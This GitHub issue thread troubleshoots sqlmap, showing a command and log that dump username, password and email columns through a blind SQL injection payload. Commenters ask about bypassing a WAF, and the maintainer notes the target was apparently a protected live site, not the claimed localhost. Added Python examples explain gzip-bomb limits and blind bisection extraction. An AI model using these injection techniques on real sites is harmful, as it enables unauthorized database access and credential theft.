sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

Data retrieval problem - Question Marks (utf8?) #281

Closed shayanb closed 11 years ago

shayanb commented 11 years ago

I'm trying to retrieve some columns from a database but all I get are question marks. It worked great for DB name and column names (column names had some missing characters though) but nothing works for the data:

./sqlmap.py -u "http://localhost/upc/view_comments.php?gal=1" --dbms=mysql --threads 3 --dump -D mo_upc -T users -C user,pass,email --no-cast

Output:

[11:49:40] [INFO] testing connection to the target url
[11:49:41] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---
Place: GET
Parameter: gal
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gal=1' AND 3457=3457 AND 'YuoM'='YuoM

---
[11:49:41] [INFO] testing MySQL
[11:49:41] [INFO] confirming MySQL
[11:49:41] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[11:49:41] [INFO] fetching entries of column(s) 'email, pass, user' for table 'users' in database 'mo_upc'
[11:49:41] [INFO] fetching number of column(s) 'email, pass, user' entries for table 'users' in database 'mo_upc'
[11:49:41] [INFO] retrieving the length of query output
[11:49:41] [INFO] retrieved: 
[11:49:42] [WARNING] reflective value(s) found and filtering out

[11:49:43] [INFO] resumed: 7
[11:49:43] [INFO] retrieving the length of query output
sqlmap got a 302 redirect to 'http://localhost/upc'. Do you want to follow? [Y/n] n
[11:49:46] [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large')
[11:49:46] [WARNING] turning off page compression
[11:49:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is going to retry the request
[11:49:46] [WARNING] if the problem persists please try to lower the number of used threads (--threads)
15
[11:50:05] [INFO] retrieved: ???????????????             
[11:50:05] [INFO] retrieving the length of query output
[11:50:05] [INFO] retrieved: 9
[11:50:20] [INFO] retrieved: ?????????           
[11:50:20] [INFO] retrieving the length of query output
[11:50:20] [INFO] retrieved: 6
[11:50:24] [INFO] retrieved: ???___ 3/6 (50%)^C

[11:50:25] [INFO] waiting for threads to finish (Ctrl+C was pressed)
[11:50:25] [INFO] retrieved: ??????
[11:50:25] [WARNING] Ctrl+C detected in dumping phase                          
[11:50:25] [INFO] analyzing table dump for possible password hashes
Database: mo_upc
Table: users
[1 entry]
+-----------+------+-----------------+
| pass      | user | email           |
+-----------+------+-----------------+
| ????????? | ??????????????? |
+-----------+------+-----------------+

I also added --charset=utf-8 and --charset=utf8 but it doesn't seem to work.

stamparm commented 11 years ago

That error, detected invalid data for declared content encoding 'gzip' ('size too large'), means that you are getting either invalid compressed data or a file that is too large (>100MB). Something is wrong here, but I wouldn't blame sqlmap for sure.

Could you please provide more details to miroslav@sqlmap.org ?

shayanb commented 11 years ago

What details are needed?

I got the same error when extracting the DB name and columns but they worked out.

stamparm commented 11 years ago

Could you please send the traffic file for that case? You can get it by just appending --fresh-queries -t traffic.txt to that same run.

shayanb commented 11 years ago

I just sent the email with the file attached. I had to abort (Ctrl + C) the data retrieval after 2 rows though, as it was on the live version.

stamparm commented 11 years ago

False statements about "live" and "localhost" installation. "Live" site had protection. Details known to me.

shayanb commented 11 years ago

Hope my explanations resolved the issue! thanks for the support though!

sagakrypto commented 10 years ago

Hello there! Is there any impact of [ERROR] detected invalid data for declared content encoding 'gzip' ('size too large') on database or table retrieval? I am also suffering from the same issue: I got the injection point but get invalid characters in database and banner names.

stamparm commented 10 years ago

[ERROR] detected invalid data for declared content encoding 'gzip' ('size too large') on database or table retrieval - is usually a sign of some kind of WAF/IPS (they trick attackers into downloading massive fake responses)

get invalid characters in database and banner names. - if you get invalid characters everywhere, then you are most probably dealing with a false positive.
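The "size too large" check described above, as an added example that is not code from the thread or from sqlmap itself: a gzip-declared HTTP body is inflated with a hard cap on the decompressed size, so a few kilobytes on the wire that a WAF/IPS crafted to expand into gigabytes are rejected instead of exhausting memory, and corrupt or truncated gzip data is reported separately as invalid. The 1 MiB cap, the header dictionary shape, and the zero-filled "bomb" used as the fake response are constructed for the demonstration (the thread quotes sqlmap's own limit as >100MB).

```python
import gzip
import zlib

# Cap on inflated size for the demo. The thread quotes sqlmap's limit as >100MB;
# 1 MiB is a constructed value that keeps this example fast.
MAX_DECOMPRESSED_SIZE = 1 * 1024 * 1024


class SizeTooLarge(Exception):
    """The gzip body inflates past the cap: a decompression bomb or a bogus response."""


class InvalidGzip(Exception):
    """The body is not valid gzip data (corrupt, truncated, or not gzip at all)."""


def decode_gzip_body(body: bytes, limit: int = MAX_DECOMPRESSED_SIZE) -> bytes:
    """Inflate a gzip-encoded HTTP body without ever holding more than `limit` bytes.

    zlib's max_length stops inflation after limit+1 bytes, so a payload that is
    tiny on the wire but expands to gigabytes is rejected before it can be
    buffered in full.
    """
    d = zlib.decompressobj(wbits=31)  # wbits=31: gzip header and trailer expected
    try:
        out = d.decompress(body, max_length=limit + 1)
    except zlib.error as exc:
        raise InvalidGzip(f"invalid compressed data: {exc}") from exc
    if len(out) > limit or d.unconsumed_tail:
        raise SizeTooLarge(f"inflated size exceeds {limit} bytes")
    if not d.eof:
        raise InvalidGzip("truncated gzip stream")
    return out


def decode_response_body(headers: dict, body: bytes, limit: int = MAX_DECOMPRESSED_SIZE):
    """Return (status, body) where status is 'ok', 'size too large' or 'invalid data'.

    On a failure the raw (still compressed) body is handed back so the caller can
    log or inspect it, the way a scanner would fall back to an uncompressed view.
    """
    encoding = headers.get("Content-Encoding", "").lower()
    if encoding != "gzip":
        return "ok", body
    try:
        return "ok", decode_gzip_body(body, limit)
    except SizeTooLarge:
        return "size too large", body
    except InvalidGzip:
        return "invalid data", body


def make_gzip_bomb(inflated_size: int) -> bytes:
    """Constructed stand-in for a WAF's fake response: highly compressible data that
    is a few KiB on the wire but `inflated_size` bytes once decompressed."""
    return gzip.compress(b"\0" * inflated_size)


if __name__ == "__main__":
    hdr = {"Content-Encoding": "gzip"}
    print(decode_response_body(hdr, gzip.compress(b"<html>real page</html>")))
    bomb = make_gzip_bomb(16 * 1024 * 1024)  # 16 MiB of zeros, roughly 16 KiB compressed
    print(len(bomb), decode_response_body(hdr, bomb)[0])   # ... 'size too large'
    print(decode_response_body(hdr, b"not gzip at all")[0])  # 'invalid data'
```

The point of the cap is that the decision is made from the inflated byte count, not from Content-Length, since the compressed size is exactly what the fake response keeps small.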

sagakrypto commented 10 years ago

Is there any way to bypass this WAF/IPS and retrieve the real dbs and banners?

stamparm commented 10 years ago

Usually you'll need to find it out yourself (through manual exploitation). It really varies from case to case.

ashee69 commented 9 years ago

Hello @stamparm, excuse me for commenting on someone else's thread. I am also in the same situation, but sqlmap is extracting valid data; it is just extremely slow. Some details about the database:
web server operating system: Linux CentOS 6.5
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11

And that's how it is behaving:
[17:09:15] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[17:09:15] [WARNING] time-based comparison requires larger statistical model, please wait.............................
[17:10:17] [DEBUG] declared web page charset 'utf-8'
[17:10:17] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors

It first extracts some long characters, then turns them into valid data. Is there any way to improve the data retrieval, and could you also please suggest a document to read about what is happening there? Thank you.
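Two points raised in this thread, stamparm's "invalid characters everywhere means a false positive" and the question about why time-based dumping is slow, come down to the same mechanism: blind extraction recovers each character by bisecting its ASCII code through a true/false oracle. The example below is added here and is not code from the thread or from sqlmap; it simulates the oracle in memory with a constructed row ("admin" as the result of an assumed query), and the condition grammar it understands is the usual MySQL `ASCII(SUBSTRING(...))>n` shape rather than sqlmap's exact payloads. It shows why a false-positive channel (one that answers identically for every request, as a WAF serving the same page would) yields the same junk character at every position, and the pre-flight check that catches it: the oracle must tell a known-true condition from a known-false one before anything is extracted.

```python
import re
from typing import Callable

# A boolean oracle answers "did the injected condition evaluate to true?", which is
# what comparing the response against the baseline page gives you in a
# boolean-based (or time-based) blind injection.
Oracle = Callable[[str], bool]

# Condition grammar the constructed oracles understand. It mirrors the common
# MySQL bisection payload; the exact strings sqlmap sends are not claimed here.
_CHAR_COND = re.compile(r"ASCII\(SUBSTRING\(\((.+)\),(\d+),1\)\)>(\d+)")


def make_oracle(rows: dict) -> Oracle:
    """Constructed honest back end: `rows` maps a query text to its single result."""
    def oracle(cond: str) -> bool:
        if cond == "1=1":
            return True
        if cond == "1=2":
            return False
        m = _CHAR_COND.fullmatch(cond)
        if not m:
            raise ValueError(f"unsupported condition: {cond}")
        value, pos, n = rows[m.group(1)], int(m.group(2)), int(m.group(3))
        code = ord(value[pos - 1]) if pos <= len(value) else 0  # MySQL: ASCII('') = 0
        return code > n
    return oracle


def false_positive_oracle(cond: str) -> bool:
    """A WAF/IPS that answers every request with the same page: the response
    comparison marks every condition 'true' regardless of what was injected."""
    return True


def confirm_oracle(oracle: Oracle) -> bool:
    """Sanity check before extracting anything: the channel must distinguish a
    known-true from a known-false condition, otherwise it is a false positive."""
    return oracle("1=1") and not oracle("1=2")


def extract_char(oracle: Oracle, query: str, pos: int) -> tuple:
    """Bisect the ASCII code (0..127) of character `pos` of the query result.
    Returns (character, number_of_oracle_queries); the bisection always takes 7."""
    lo, hi, queries = 0, 127, 0
    while lo < hi:
        mid = (lo + hi) // 2
        queries += 1
        if oracle(f"ASCII(SUBSTRING(({query}),{pos},1))>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo), queries


def extract_string(oracle: Oracle, query: str, length: int) -> tuple:
    """Return (recovered_string, total_queries) without checking the oracle first."""
    chars, total = [], 0
    for pos in range(1, length + 1):
        c, q = extract_char(oracle, query, pos)
        chars.append(c)
        total += q
    return "".join(chars), total


def dump_value(oracle: Oracle, query: str, length: int) -> tuple:
    """What a careful dump does: refuse to extract through a channel that fails the check."""
    if not confirm_oracle(oracle):
        raise ValueError("oracle cannot tell true from false: likely a false positive")
    return extract_string(oracle, query, length)


if __name__ == "__main__":
    query = "SELECT user FROM users LIMIT 1"        # assumed query, not from the thread
    honest = make_oracle({query: "admin"})           # constructed row
    print(dump_value(honest, query, 5))              # ('admin', 35)
    # Through a false-positive channel every bisection runs to the top of the range,
    # so every "retrieved" character is the same meaningless byte:
    print(extract_string(false_positive_oracle, query, 5))  # ('\x7f\x7f\x7f\x7f\x7f', 35)
    print(confirm_oracle(false_positive_oracle))     # False
```

The query count returned by `extract_string` is also the cost model for the time-based case in the last comment: seven requests per character, and in a time-based channel each request has to wait out the injected delay before the oracle can answer, so a 5-second delay means at least 35 seconds per character before any statistical re-checking is added.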